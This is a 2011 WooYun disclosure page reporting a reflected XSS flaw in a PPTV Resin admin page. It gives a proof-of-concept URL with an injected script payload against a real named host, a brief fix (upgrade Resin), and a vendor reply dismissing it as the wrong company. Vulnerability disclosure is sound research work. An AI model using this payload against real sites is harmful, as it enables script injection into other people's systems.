当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-01741

漏洞标题:PPTV后台存在跨站漏洞

相关厂商:PPS网络电视

漏洞作者: Jacks

提交时间:2011-03-28 14:35

修复时间:2011-03-28 14:56

公开时间:2011-03-28 14:56

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2011-03-28: 细节已通知厂商并且等待厂商处理中
2011-03-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

后台存在xss

详细说明:

后台存在xss

漏洞证明:

http://istat.pptv.com/resin-admin/digest.php?digest_attempt=1&digest_realm=%22%3E%3Cscript%3Ealert(%22by%20jacks%22)%3C/script%3E%3Ca&digest_username[]=

修复方案:

升级resin.

版权声明:转载请注明来源 Jacks@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2011-03-28 14:56

厂商回复:

PPS和PPTV不是一家的。。。。

漏洞Rank:1 (WooYun评价)

最新状态:

2011-03-28:PPS和PPTV不是一家的。。。。。。

漏洞评价:

评论

  1. 2011-03-28 17:23 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

  2. 2011-03-28 17:58 | pg5yl8 ( 实习白帽子 | Rank:91 漏洞数:12 | 我神马都不会 但我常常被人日 这是为神马呢)

    真囧

  3. 2011-03-28 19:28 | Jacks ( 普通白帽子 | Rank:162 漏洞数:25 | ╮(╯▽╰)╭ 情何以堪 http://royalhack....)

    啊。。OMG。。。 是 PPLIVE啊